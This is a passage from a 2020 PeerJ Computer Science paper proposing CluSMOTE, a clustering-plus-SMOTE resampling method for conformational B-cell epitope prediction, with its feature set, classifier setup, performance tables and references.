distinguish surface and buried residues. Different values were used as limits, including the 0.05, 0.01, 0.1, and 0.25 thresholds (Rubinstein, Mayrose & Pupko, 2009; Zhang et al., 2011; Kringelum et al., 2012; Ren et al., 2014; Dalkas & Rooman, 2017). This variation affects the imbalance ratio between the data epitope and non-epitope classes. Although the standard burial and non-burial threshold are 0.05, the value of 0.01 is used as the limit. This is because of the larger the surface exposure threshold, the smaller the predictive performance (Basu, Bhattacharyya & Banerjee, 2011; Kringelum et al., 2012). Choosing 0.01 as the limit is relevant to the finding of Zheng et al. (2015), where all RSA values of epitopes are positive, though slightly larger than zero. The feature vectors used include accessible surface area (ASA), RSA, depth index (DI), protrusion index (PI), contact number (CN), HSE, quadrant sphere exposure (QSE), AAindex, B factor, and log odds ratio, as shown in Table 1. ASA and RSA are the key features in determining if a residue is likely to bind to other molecules for accessibility reasons. Although several programs can be used to calculate ASA, the most commonly used include NACCESS and DSSP (Hubbard & Thornton, 1993; Kabsch & Sander, 1983). DSSP only calculates the total ASA per residue, while NACCESS computes the backbone, side chain, polar, and nonpolar ASA. However, NACCESS can only count one molecular structure at a time. These users need to create additional scripts to count several molecular structures at a time (Mihel et al., 2008). This study used the PSAIA application was used (Mihel et al., 2008). The PSAIA is not only limited to counting one molecular structure but can be used to calculate other features, including RSA, PI, and DI. No significant difference is observed between the ASA calculation results using Solihah et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.275 5/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.275#supp-1 http://dx.doi.org/10.7717/peerj-cs.275 Data preprocessing (feature extraction) CLuSMOTE Classify at residual level Classification Model 3D Structure of Antigen complex Database of 3D Structure of Antigen Antibody Complex contain validated epitope Conformational B cell epitope prediction Feature extraction Epitope candidate Figure 1 Development stage of conformational B-cell epitopes prediction. . Full-size DOI: 10.7717/peerjcs.275/fig-1 Table 1 Features for antigenic determinant and the methods to compute. Category Feature Data Source/Method Structural ASA PSAIA Mihel et al. (2008) RSA PSAIA Mihel et al. (2008) Protrusion Index PSAIA Mihel et al. (2008) CN Nishikawa & Ooi (1980) HSE Hamelryck (2005) QSE Li et al. (2011) Physicochemical AAIndex Kawashima et al. (2008) B factor Ren et al. (2014) and Ren et al. (2015) Statistic Log-odd ratio Andersen, Nielsen & Lund (2006) Notes. ASA, solvent-accessible surface area; RSA, Relative solvent-accesible Surface Area; CN, Contact Number; HSE, Half- Sphere Exposure; QSE, Quadrant Sphere Exposure; AAIndex, Amino Acid Index. NACCESS and PSAIA. The ASA attribute values used include the backbone, side chain, polar (including oxygen, nitrogen, and phosphorus), and nonpolar atoms (carbon atoms). RSA is the result of the ASA value with the maximum figure calculated based on the GXG tripeptide theory, where G is glycine and X is the residual sought (Lee & Richards, 1971). Solihah et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.275 6/17 https://peerj.com https://doi.org/10.7717/peerjcs.275/fig-1 http://dx.doi.org/10.7717/peerj-cs.275 The maximum value of ASA is obtained from Tien et al. (2013), which is an improvement of Rost & Sender (1994) and Millerl et al. (1987). There was no difference in the list of datasets obtained using the three methods, as presented in Appendix 1. The RSA attribute values used include the total RSA of all atoms, backbone atoms, side-chain atoms, polar atoms (including oxygen, nitrogen, and phosphorus), and nonpolar atoms (carbon atoms). DI: The DI of the i th atom refers to its minimum distance to the exposed atoms. The DI attribute values used include the average and standard deviation of all atoms, average of side-chain atoms, maximum, and minimum. PI: The PI is the ratio of the space of a sphere with a radius of 10 A centered on C α divided by the area occupied by the heavy atoms constituting proteins (Pintar, Carugo & Pongor, 2002). In this study, PI was calculated using the PSAIA software (Mihel et al., 2008). The PI attribute values used include the average and standard deviation of all atoms, average of side-chain atoms, maximum, and minimum. CN, HSE, QSE: The CN is the total number of C α adjacent to the residue measured under the microsphere environment. It is limited by a ball with radius r centered on C α (Nishikawa & Ooi, 1980). In HSE, the number of C α was distributed in two areas, including the upper hemisphere and the lower hemisphere balls (Hamelryck, 2005). In QSE, the number of C α was specifically distributed in eight regions in the microsphere environment (Li et al., 2011). AAindex: The AAindex consists of 544 indices representing the amino acid physicochemical and biochemical properties (Kawashima et al., 2008). The AAindex value of each residue was extracted from component I of the HDRATJCI constituents in the aaindex1.txt file. The detail of component I of aaindex file is attached as a Table S3. B factor: The B factor indicates the flexibility of an atom or a residue. An exposed residue has a larger B factor than a latent residue. The B factor for each atom is derived from the PDB data. The attribute values used include the B factor of C α and the average of all atoms or residues (Ren et al., 2014). Log odds ratio: This feature is extracted based on the primary protein structure and calculated based on Andersen, Nielsen & Lund (2006). A sliding window of size 9 residues was run in each sequence of antigens in the dataset to form overlapping segments that can be used in the calculation of the appearance of the individual residues. Each segment was grouped as an epitope or non-epitope depending on its center. The log odds ratio was calculated at the fifth position residue based on Nielsen, Lundegaard & Worning (2004). In this study, a segment would be included in the calculation in case the fifth position residue is exposed. Epitope annotation on the antigen residue is carried out by analyzing the interaction in the PSAIA software (Mihel et al., 2008) using contact criterion, threshold, and Van der Waals radii. The maximum distance of 4 was derived from the chotia.radii file. The ASA change parameters include the Delta ASA, Z_Slice Size, and Probe Radius with values 1.0, 0.25, and 1.4, respectively. The interaction analyzer output is a list of all adjacent residual pairs within the allowable distance range. A procedure for selecting antigen residues that bind to antibodies is created to obtain a list of epitopes. Solihah et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.275 7/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.275#supp-1 http://dx.doi.org/10.7717/peerj-cs.275 Class imbalance Dataset Minority class (epitope) Majority class (non-epitope) Clustering-based undersampling Randomly Selected data from each cluster SMOTE Balance DatasetNew dataset Figure 2 CluSMOTE sampling. Full-size DOI: 10.7717/peerjcs.275/fig-2 Handling class imbalance with CluSMOTE Resampling with undersampling and oversampling has advantages and disadvantages. Therefore, cluster-based sampling was conducted to minimize the loss of information caused by the pruning effect of undersampling. Oversampling with SMOTE has often proven to be reliable. Merging the two increases classifier performance. A parameter stating the degree of oversampling is used to identify the optimal combination. This study proposed CluSMOTE, a cluster-based undersampling mechanism combined with SMOTE as shown in Fig. 2. Negative class data are clustered using the Hierarchical Density-Based Spatial Clustering of Applications with Noise (HDBSCAN) algorithm. This is meant to identify the optimal clusters based on stability (Campello, Moulavi & Sander, 2013). The number of clusters is less than the positive class data. This means each cluster contains several data. The simplest sampling mechanism is random selection. To select data, the cluster size and degree of oversampling should be considered. The proposed CluSMOTE method uses the following steps, 1. Separate the positive and the negative class data. 2. Cluster the negative class ( −) using the HDBScan algorithm. 3. Take a certain number of data items from each cluster. Consider the ratio of the number of clusters to the overall members of the negative class. The samples from the Ci cluster is defined in (1), according to Sowah et al. (2016). where MI is the number of minority class samples, MA is the total number of majority classes, M_ci is the number of Ci cluster members, and r is the negative class dataset ratio from the cluster. In case r =2, the number of negative class datasets to be formed is twice the positive class datasets. The samples are taken from each cluster randomly. Size_Ci=r×MI×M_ci/MA (1) 4. Combine positive classes with all datasets taken in Step 3. 5. Carry out SMOTE on the results obtained in Step 4. Program implementation was conducted in the Java programming environment with NetBeans IDE 8.2. A new class for implementing the CluSMOTE method was implemented Solihah et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.275 8/17 https://peerj.com https://doi.org/10.7717/peerjcs.275/fig-2 http://dx.doi.org/10.7717/peerj-cs.275 in the Java Language Programming, supported by the JSAT statistics library version 0.09 (Raff, 2017). Classification algorithm Two classification algorithms, SVM and DT, were used to evaluate the performance of CluSMOTE. Generally, SVM is a popular learning algorithm used in previous studies of conformational epitope prediction. DT is often used to handle the class imbalance problem and classified as one of the top 10 data mining algorithms (Galar et al., 2012). This study uses the JSAT (Raff, 2017) software package, utilizing the Pegasos SVM with a mini-batch linear kernel (Shalev-shwartz, Singer & Srebro, 2007). Pegasos SVM works fast since the primal update process is carried out directly, and no support vector is stored. The default values used for the epoch, regularization, and batch size parameters include 5, 1e−4, and 1, respectively. The decision tree is formed by nodes that are built on the principle of decision stump (Iba & Langley, 1992). Also, the study used a bottom-up pessimistic pruning with error-based pruning from the C4.5 algorithm (Quinland, 1993). The proportion of the data set used for pruning is 0.1. Performance measurement of the conformational epitope prediction model A dataset used for conformational epitope prediction contains the class imbalance problem. The area used is mainly under the ROC curve (AUC) as a performance parameter. In class imbalance, the AUC is a better measure than accuracy, which is biased to the majority class. Another performance parameter used is F-measure, as expressed in Eq. (2): Fm= 2∗PPV ∗SE PPP+SE =2∗TP/(2∗TP+FN +FP) (2) where PPV=TP/(TP + FP) and SE denote sensitivity or TPR. The F-measure is not affected by imbalance conditions provided the training data used are balanced (Batuwita & Palade, 2009). Other metrics that can be used to assess performance include Gmean and adjusted Gmean (AGm). The Gmean is expressed in Eq. (3) below, Gmean= √ SP∗SE (3) where SP denotes specificity/TPR and SE denotes sensitivity/FPR. AGm is expressed in Eq. (4): AGm= { (Gm+SP∗N)/(1+Nn) if SE >0 0 if SE =0 (4) where Gm is Gmean, SP specificity, SE sensitivity, and Nn the proportion of negative samples in the dataset. AGm is suitable for application in case an increase in TPR is achieved with minimal reduction in TNR. Generally, this criterion is suitable for bioinformatics cases, where errors in the identification of negative classes are unexpected (Batuwita & Palade, 2009). In the case of epitope prediction, the false negative is not expected to be high. The selection of the wrong residue leads to the failure of the subsequent process. Solihah et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.275 9/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.275 RESULTS AND DISCUSSIONS The complex-based leave-one-out cross-validation method is used to test the reliability of the classifier model. Each training set is built from the n − 1 complexes and tested with a test set from the n-th complex. Model performance was measured using seven parameters, including TPR, TNR, precision, AUC, Gmean, AGm, and F-measure. Effect of the selection of the r value on model performance In the original dataset, the ratio of imbalance between negative and positive classes is 10:1. To assess the effectiveness of sampling, this study utilized several r values derived using the ratio of negative to positive class data. The value r =1 indicates that only the clustering and undersampling steps are applied. The value r =2 indicates that the number of negative class datasets is twice the number of positive ones. The test results obtained without a balancing mechanism show the effectiveness of the proposed resampling method. The results of the assessment of the performance of the classification model expressed by the TPR, TNR, precision, AUC, Gmean, AGm, and F-measure parameters are shown in Table 2. The results of internal model validation on several variations of the r-value are also shown in Table 2. Where the r-value varies from r =1 to r =5, both in CluSMOTE DT and CluSMOTE SVM, the TPR and the FPR value tends to decrease with the increase in the r-value. The larger the degree of oversampling, the smaller the TPR. The TNR value, as well as precision, also tends to increase with the increase in the r-value. The increase in TNR values means more negative classes are recognized. This can also be interpreted as TNR value increases means less information loss of the negative class. These two conditions indicate a trade-off between the degrees of oversampling and undersampling. Oversampling without undersampling yields TNR and precision values greater than undersampling without oversampling. Similarly, undersampling without oversampling yields TPR and FPR values greater than oversampling without undersampling. This finding indicates the undersampling mechanism is more effective in increasing positive class recognition than the oversampling, which is consistent with previous studies. Also, the resampling mechanism increases the TPR and FPR values compared to no resampling. However, the overall performance improvement indicated by the AUC, Gmean, AGm, and F-measure is not significant. In CluSMOTE DT, AUC and Gmean have the same tendency. The best AUC and Gmean are 0.815 and 0.811 at r =2 respectively. The AGm and F-measure values also have the same tendency, though the values are different. In DT, the best AGm and F-measure are obtained using the SMOTE oversampling method. In the SVM classifier, the best AGm is obtained using the SMOTE oversampling mechanism. However, the best F-measure is obtained using CluSMOTE at r =5. Previous studies on class imbalance stated that the hybrid resampling method could significantly improve performance. However, this was not the case in epitope prediction using the CluSMOTE DT method. No r value significantly influenced the overall performance improvement expressed by the AUC, Gmean, AGm, and F-measure. In case the TPR and TNR values are considered together, the selection of r =2 is quite good as shown by the AUC and Gmean values. The selection of r values based on the experiment Solihah et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.275 10/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.275 Table 2 Performance of classification model with variations in the r-value. No Resampling method r classifier TPR (recall) TNR Precision (PPV) FPR AUC Gmean Adjusted Gmean Fmeasure 1 Cluster-based only 1 DT 0.855a 0.769 0.454 0.231a 0.812 0.806 0.791 0.581 2 CluSMOTE 2 DT 0.797 0.834 0.526 0.163 0.815a 0.811a 0.823 0.622 3 CluSMOTE 3 DT 0.764 0.862 0.558 0.138 0.813 0.807 0.833 0.634 4 CluSMOTE 4 DT 0.730 0.881 0.575 0.119 0.806 0.796 0.835 0.631 5 CluSMOTE 5 DT 0.724 0.880 0.591 0.120 0.802 0.794 0.834 0.641 6 SMOTE only – DT 0.644 0.939a 0.732a 0.061 0.791 0.771 0.848a 0.675a 7 No Resampling – DT 0.637 0.939 0.730 0.061 0.788 0.767 0.846 0.669 8 Cluster-based only 1 SVM 0.591b 0.668 0.393 0.328b 0.629 0.579 0.620 0.388 9 CluSMOTE 2 SVM 0.577 0.746 0.441 0.254 0.661b 0.60b 0.666 0.400 10 CluSMOTE 3 SVM 0.498 0.790 0.486 0.210 0.644 0.580 0.675 0.396 11 CluSMOTE 4 SVM 0.475 0.801 0.508 0.199 0.638 0.566 0.672 0.387 12 CluSMOTE 5 SVM 0.468 0.819 0.529 0.178 0.643 0.572 0.683 0.401b 13 SMOTE only – SVM 0.384 0.881b 0.606b 0.119 0.632 0.532 0.688 0.368 14 No Resampling – SVM 0.409 0.874 0.569 0.126 0.641 0.557 0.699b 0.392 Notes. TPR, True Positive Rate; TNR, True Negaitive Rate; AUC, Area Under ROC Curve; Gmean, Geometric mean. aThe best parameter value in DT model. bThe best parameter vaue in SVM model. shows opposing conditions between the TPR and TNR. From Table 2, the best performance using AUC and Gmean is fairer compared to Agm and F-score. In the best AUC and AGm, a balanced proportion was obtained between the TPR and TNR. The best AGm and F-score resulted from the lowest TPR value. Generally, the performance models built with DT exhibit better performance than those from SVM. The performance of SVM is likely to be affected by kernel selection problems. Linear kernels are cannot separate the classes in polynomial cases. Other configurations or models may be explored for future work. Comparison of the proposed method with previous methods CluSMOTE DT was evaluated on an independent test set from Kringelum et al. (2012) by filtering the dataset from the details used in the training process of the method being compared. A total of 39 antigen data were used in the comparison, as listed in tab4. The final results of the test show that CluSMOTE with r =2 is superior to the other methods with an average AUC value of 0.83. The average AUC values of Discotope, Ellipro, Epitopia, EPCES, PEPITO, and Discotope 2.0 were 0.727, 0.721, 0.673, 0.697, 0.746, and 0.744, respectively. CluSMOTE DT with r =2 was evaluated on the independent test set of glycoprotein antigen by Zhou et al. (2019). Testing with glycoprotein antigen showed that the performance of CluSMOTE DT was similar to that of SEPPA 3.0, with the AUC values of 0.766 and 0.739, respectively. Both CluSMOTE DT and SEPPA 3.0 were superior to Epitopia, Discotope 2.0, PEPITO, CBTOPE, SEPPA 2.0, and BepiPred 2.0. The detailed performance of the eight methods compared is shown in tab5. The AUC achieved by CluSMOTE DT is comparable to the one from SEPPA 3.0, showing that the proposed Solihah et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.275 11/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.275 method might handle epitope cases with glycoprotein well. The model developed with CluSMOTE uses the dataset presented by Andersen, Nielsen & Lund (2006), which consists of 76 antigen structures. The number of complex structures used in the CluSMOTE model is less than that used in SEPPA 3.0, which consists of 767 antigen structures. The small number of antigen structures speeds up the training time for model development. CONCLUSIONS An epitope is a small part of the exposed antigen that creates class imbalance problems in the prediction of learning-based conformational epitopes. In this study, the CluSMOTE method was proposed to overcome the class imbalance problem in the prediction of the conformational epitope. The study shows that CluSMOTE considerably increases the TPR compared to SMOTE only. The comparison of the proposed model with state-of-the-art methods in the two datasets shows that CluSMOTE DT is comparable to or better than other methods. Its mean AUC values in Kringelum and the SEPPA 3.0 test sets are 0.83 and 0.766, respectively. This result shows that CluSMOTE DT is better than other methods in classifying the general protein antigen, though it is comparable to SEPPA 3.0 in the glycoprotein antigen. ACKNOWLEDGEMENTS The authors thank the Publishing and Publication Agency of Universitas Gadjah Mada for the English proof-reading of this manuscript. ADDITIONAL INFORMATION AND DECLARATIONS Funding This work was supported by Universitas Trisakti (Doctoral scholarship). The funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. Grant Disclosures The following grant information was disclosed by the authors: Universitas Trisakti (Doctoral scholarship). Competing Interests The authors declare there are no competing interests. Author Contributions • Binti Solihah conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. • Azhari Azhari and Aina Musdholifah conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. Solihah et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.275 12/17 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.275 Data Availability The following information was supplied regarding data availability: The data and source code are available at GitHub: - https://github.com/BSolihah/LIBFROMJSAT - https://github.com/BSolihah/conformational-epitope-predictor. Supplemental Information Supplemental information for this article can be found online at http://dx.doi.org/10.7717/ peerj-cs.275#supplemental-information. REFERENCES Andersen PH, Nielsen M, Lund OLE. 2006. Prediction of residues in discontinu- ous B-cell epitopes using protein 3D structures. Protein Science 15:2558–2567 DOI 10.1110/ps.062405906.2558. Ansari HR, Raghava GPS. 2010. Identification of conformational B-cell Epitopes in an antigen from its primary sequence. Immunome Research 6(1):1–26 DOI 10.1186/1745-7580-6-6. Basu S, Bhattacharyya D, Banerjee R. 2011. Mapping the distribution of packing topologies within protein interiors shows predominant preference for specific packing motifs. BMC Bioinformatics 12(195)1–26 DOI 10.1186/1471-2105-12-195. Batuwita R, Palade V. 2009. A new performance measure for class imbalance learning. Application to bioinformatics problems. In: International conference on machine learning and applications. Miami Beach, Florida. Florida: IEEE Computer Society, 545–550 DOI 10.1109/ICMLA.2009.126. Batuwita R, Palade V. 2012. Class imbalance learning methods for support vector. In: He H, Ma Y, eds. Imbalanced learning: foundations, algorithms, and applications. Hoboken: John Wiley & Sons, Inc, 83–99. Berman HM, Westbrook J, Feng Z, Gilliland G, Bhat TN, Weissig H, Shindyalov IN, Bourne PE. 2000. The protein data bank. Nucleic Acids Research 28(1):235–242 DOI 10.1093/nar/28.1.235. Blaszczynski J, Stefanowski J. 2014. Neighbourhood sampling in bagging for imbalanced data. Neurocomputing 150:529–542 DOI 10.1016/j.neucom.2014.07.064. Campello RJGB, Moulavi D, Sander J. 2013. Density-based clustering based on hierar- chical density estimates. In: Pei J, Tseng VS, Cao L, Motoda H, Xu G, eds. Advances in knowledge discovery and data mining PAKDD Part II LNAI. Berlin: Springer, 160–172. Chawla NV, Bowyer KW, Hall LO, Kegelmeyer WP. 2002. SMOTE: synthetic minority over-sampling technique. Journal of Artificial Intelligence Research 16:321–357 DOI 10.1613/jair.953. Chawla NV, Cieslak DA, Hall LO, Joshi A. 2008. Automatically countering imbalance and its empirical relationship to cost. Data Mining and Knowledge Discovery 17(2):225–252 DOI 10.1007/s10618-008-0087-0. Solihah et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.275 13/17 https://peerj.com https://github.com/BSolihah/LIBFROMJSAT https://github.com/BSolihah/conformational-epitope-predictor http://dx.doi.org/10.7717/peerj-cs.275#supplemental-information http://dx.doi.org/10.7717/peerj-cs.275#supplemental-information http://dx.doi.org/10.1110/ps.062405906.2558 http://dx.doi.org/10.1186/1745-7580-6-6 http://dx.doi.org/10.1186/1471-2105-12-195 http://dx.doi.org/10.1109/ICMLA.2009.126 http://dx.doi.org/10.1093/nar/28.1.235 http://dx.doi.org/10.1016/j.neucom.2014.07.064 http://dx.doi.org/10.1613/jair.953 http://dx.doi.org/10.1007/s10618-008-0087-0 http://dx.doi.org/10.7717/peerj-cs.275 Chawla NV, Lazarevic A, Hall LO, Bowyer KW. 2003. In: SMOTEBoost: Improving prediction of the minority class in boosting 7th european conference on principles and practice of knowledge discovery SMOTEBoost: improving prediction of the minority class in boosting. In: Lecture Notes in Computer Science. DOI 10.1007/978-3-540-39804-2. Dalkas GA, Rooman M. 2017. SEPIa, a knowledge-driven algorithm for predicting conformational B-cell epitopes from the amino acid sequence. BMC Bioinformatics 18(95):1–12 DOI 10.1186/s12859-017-1528-9. Das B, Krishnan NC, Cook DJ. 2013. Handling class overlap and imbalance to detect prompt situations in smart homes. In: IEEE 13th international conference on data mining workshops. IEEE Computer Society. 266–273 DOI 10.1109/ICDMW.2013.18. Drummond C, Holte RC. 2003. C4. 5, Class imbalance, and cost sensitivity : Why under- sampling beats over-sampling. In: ICML workshop on learning from imbalanced data sets II. Washington, D.C. Elkan C. 2001. The foundations of cost-sensitive learning. In: Proceedings of the seven- teenth international joint conference on artificial intelligence. 973–978. Estabrooks A, Jo T, Japcowick N. 2004. A multiple resampling method for learning from imbalanced data sets. Computational Intelligence 20(1):18–36 DOI 10.1111/j.0824-7935.2004.t01-1-00228.x. Freund Y, Schapire RE. 1996. Experiments with a new boosting algorithm. In: Machine learning: proceedings of the thirteenth international conference. Galar M, Fern A, Barrenechea E, Bustince H. 2012. Hybrid-based approaches. IEEE Transactions on Systems Man and Cybernetics Part C (Applications and Reviews) 42(4):463–484 DOI 10.1109/TSMCC.2011.2161285. Gary MW. 2012. Foundation of imbalanced learning. In: He H, Ma Y, eds. Imbalanced learning: foundations, algorithms, and applications. Hoboken: John Wiley & Sons, Inc, 13–42. Hamelryck T. 2005. An amino acid has two sides : a new 2D measure provides a different view of solvent exposure. 2005. Proteins Structure, Funct Bioinforma 59:38–48 DOI 10.1002/prot.20379. Han H, Wang W, Mao B. 2009. Borderline-SMOTE: a new over-sampling method in imbalanced data sets learning. In: Huang DS, Zhang XP, Huang GB, eds. Advances in Intelligent Computing. ICIC 2005. Lecture notes in computer science, vol. 3644, Berlin, Heidelberg: Springer, 878–887. He H, Garcia EA. 2009. Learning from Imbalanced Data. IEEE Transactions on Knowledge and Data Engineering 21(9):1263–1284. Hubbard SJ, Thornton JM. 1993. NACCESS. Computer Program Version 2.1.1. London: Department of Biochemistry and Molecular Biology, University College London. Iba W, Langley P. 1992. In: Induction of one-level decision trees, in ML92: proceedings of the ninth international conference on machine learning. Aberdeen, Scotland: 233–2401–3 1992, San Francisco, CA: Morgan Kaufmann, 1992(July). Solihah et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.275 14/17 https://peerj.com http://dx.doi.org/10.1007/978-3-540-39804-2 http://dx.doi.org/10.1186/s12859-017-1528-9 http://dx.doi.org/10.1109/ICDMW.2013.18 http://dx.doi.org/10.1111/j.0824-7935.2004.t01-1-00228.x http://dx.doi.org/10.1109/TSMCC.2011.2161285 http://dx.doi.org/10.1002/prot.20379 http://dx.doi.org/10.7717/peerj-cs.275 Japkowicz N, Myers C, Gluck M. 1995. A novelty detection approach to classification. In: The fourteenth joint conference on artificial intelligence. New York: ACM, 518–523. Jespersen MC, Peters B, Nielsen M, Marcatili P. 2017. epitope prediction using confor- mational epitopes. Nucleic Acids Research 45:24–29 DOI 10.1093/nar/gkx346. Kabsch W, Sander C. 1983. Dictionary of protein secondary structure:pattern recog- nition of hydrogen-bonded and geometrical features. Biopolymers 22:2577–2637 DOI 10.1002/bip.360221211. Kawashima S, Pokarowski P, Pokarowska M, Kolinski A, Katayama T, Kanehisa M. 2008. AAindex: amino acid index database, progress report 2008. Nucleic Acids Research 36(2007):202–205 DOI 10.1093/nar/gkm998. Kringelum JV, Lundegaard C, Lund O, Nielsen M. 2012. Reliable B cell epitope predictions: impacts of method development and improved benchmarking. PLOS Computational Biology 8(12):e1002829 DOI 10.1371/journal.pcbi.1002829. Kringelum JV, Nielsen M, Padkjaer S, Lund O. 2013. Structural analysis of B-cell epitopes in antibody: protein complexes. Molecular Immunology 53(1–2):24–34 DOI 10.1016/j.molimm.2012.06.001. Kulkarni-kale U, Bhosle S, Kolaskar AS. 2005. CEP : a conformational epitope prediction server. Nucleic Acids Research 33(Web Server issue):168–171 DOI 10.1093/nar/gki460. Lee B, Richards FM. 1971. The interpretation of protein structures: estimation of static accessibility. Journal of Molecular Biology 55:379–400 DOI 10.1016/0022-2836(71)90324-X. Li P, Pok G, KSJ A, Shon HS, Ryu KH. 2011. QSE: a new 3-D solvent exposure measure for the analysis of protein structure. Proteomics 11:3793–3801 DOI 10.1002/pmic.201100189. Liang S, Zheng D, Zhang C, Zacharias M. 2009. consensus scoring. BMC Bioinformatics 10(302):1–10 DOI 10.1186/1471-2105-10-302. Lin W, Tsai C, Hu Y, Jhang J. 2017. Clustering-based undersampling in class-imbalanced data. Information Sciences 409–410:17–26 DOI 10.1016/j.ins.2017.05.008. Liu X, Wu J, Zhou Z. 2009. Exploratory Undersampling for. IEEE Transaction on Cybernetics 39(2):539–550 DOI 10.1109/TSMCB.2008.2007853. Mihel J, Šiki M, Tomi S, Jeren B, Vlahovi K. 2008. PSAIA–protein structure and interaction analyzer. BMC Structural Biology 11:1–11 DOI 10.1186/1472-6807-8-21. Millerl S, Janin J, Leskv AM, Chothial C, Laboratories CI, Physicochimique DB. 1987. Interior and surface of monomeric proteins t. Journal of Molecular Biology 196:641–656 DOI 10.1016/0022-2836(87)90038-6. Murzin AG, Brenner SE, Hubbard T, Chothia C. 1995. SCOP : a structural classification of proteins database for the investigation of sequences and structures. Journal of Molecular Biology 247:536–540. Nielsen M, Lundegaard C, Worning P. 2004. Improved prediction of MHC class I and class II epitopes using a novel Gibbs sampling approach. Bioinformatics 20(9):1388–1397 DOI 10.1093/bioinformatics/bth100. Solihah et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.275 15/17 https://peerj.com http://dx.doi.org/10.1093/nar/gkx346 http://dx.doi.org/10.1002/bip.360221211 http://dx.doi.org/10.1093/nar/gkm998 http://dx.doi.org/10.1371/journal.pcbi.1002829 http://dx.doi.org/10.1016/j.molimm.2012.06.001 http://dx.doi.org/10.1093/nar/gki460 http://dx.doi.org/10.1016/0022-2836(71)90324-X http://dx.doi.org/10.1002/pmic.201100189 http://dx.doi.org/10.1186/1471-2105-10-302 http://dx.doi.org/10.1016/j.ins.2017.05.008 http://dx.doi.org/10.1109/TSMCB.2008.2007853 http://dx.doi.org/10.1186/1472-6807-8-21 http://dx.doi.org/10.1016/0022-2836(87)90038-6 http://dx.doi.org/10.1093/bioinformatics/bth100 http://dx.doi.org/10.7717/peerj-cs.275 Nishikawa K, Ooi T. 1980. Prediction of the surface-interior diagram of globular proteins by an empirical method.pdf. International Journal of Peptide and Protein Research 16:19–32. Pintar A, Carugo O, Pongor S. 2002. CX, an algorithm that identifies protruding atoms in proteins. Bioinformatics 18(7):980–984 DOI 10.1093/bioinformatics/18.7.980. Ponomarenko J, Bui H, Li W, Fusseder N, Bourne PE, Sette A, Peters B. 2008. ElliPro : a new structure-based tool for the prediction of antibody epitopes. BMC Bioinformat- ics 9(514):1–8 DOI 10.1186/1471-2105-9-514. Qi T, Qiu T, Zhang Q, Tang K, Fan Y, Qiu J, Wu D, Zhang W, Chen Y, Gao J, Zhu R, Cao Z. 2014. SEPPA 2.0—more refined server to predict spatial epitope considering species of immune host and subcellular localization of protein antigen. Nucleic Acids Research 42(May):59–63 DOI 10.1093/nar/gku395. Quinland JR. 1993. C4.5 programs for machine learning. San Mateo: Morgan Kaufmann. Raff E. 2017. JSAT: java statistical analysis tool, a library for machine learning. Journal of Machine Learning Research 18:1–5. Raskutti B, Kowalczyk A. 2003. Extreme Re-balancing for SVMs: a case study. In: Workshop on learning from imbalanced datasets II. Washington, D.C. Ren J, Liu Q, Ellis J, Li J. 2014. Tertiary structure-based prediction of conformational B- cell epitopes through B factors. Bioinformatics 30:264–273 DOI 10.1093/bioinformatics/btu281. Ren J, Liu Q, Ellis J, Li J. 2015. Positive-unlabeled learning for the prediction of confor- mational B-cell epitopes. BMC Bioinformatics 16(Suppl 18):1–15. Rost B, Sender C. 1994. Conservation and prediction of solvent accesibility in pro- tein families. Proteins Structure, Function Genetics 20(November):216–226 DOI 10.1002/prot.340200303. Rubinstein ND, Mayrose I, Halperin D, Yekutieli D, Gershoni JM, Pupko T. 2008. Computational characterization of B-cell epitopes. Molecular Immunology 45:3477–3489 DOI 10.1016/j.molimm.2007.10.016. Rubinstein ND, Mayrose I, Pupko T. 2009. A machine-learning approach for predicting B-cell epitopes. Molecular Immunology 46:840–847 DOI 10.1016/j.molimm.2008.09.009. Shalev-shwartz S, Singer Y, Srebro N. 2007. Pegasos: Primal Estimated sub-GrAdient SOlver for SVM. In: International Conference on Machine Learning (ICML). New York. 807–814. Sowah RA, Agebure MA, Mills GA, Koumadi KM, Fiawoo SY. 2016. New cluster undersampling technique for class imbalance learning. International Journal of Machine Learning and Computing 6(3):205–214 DOI 10.18178/ijmlc.2016.6.3.599. Sun J, Wu D, Xu T, Wang X, Xu X, Tao L, Li YX, Cao ZW. 2009. SEPPA: a computa- tional server for spatial epitope prediction of protein antigens. Nucleic Acids Research 37:612–616 DOI 10.1093/nar/gkp417. Sweredoski MJ, Baldi P. 2008. PEPITO: improved discontinuous B-cell epitope pre- diction using multiple distance thresholds and half sphere exposure. Bioinformatics 24(12):1459–1460 DOI 10.1093/bioinformatics/btn199. Solihah et al. (2020), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.275 16/17 https://peerj.com http://dx.doi.org/10.1093/bioinformatics/18.7.980 http://dx.doi.org/10.1186/1471-2105-9-514 http://dx.doi.org/10.1093/nar/gku395 http://dx.doi.org/10.1093/bioinformatics/btu281 http://dx.doi.org/10.1002/prot.340200303 http://dx.doi.org/10.1016/j.molimm.2007.10.016 http://dx.doi.org/10.1016/j.molimm.2008.09.009 http://dx.doi.org/10.18178/ijmlc.2016.6.3.599 http://dx.doi.org/10.1093/nar/gkp417 http://dx.doi.org/10.1093/bioinformatics/btn199 http://dx.doi.org/10.7717/peerj-cs.275 Tien MZ, Meyer AG, Sydykova DK, Spielman SJ, Wilke CO. 2013. Maximum allowed solvent accessibilites of residues in proteins. PLOS ONE 8(11):e80720 DOI 10.1371/journal.pone.0080635. Tsai C, Lin W, Hu Y, Yao G. 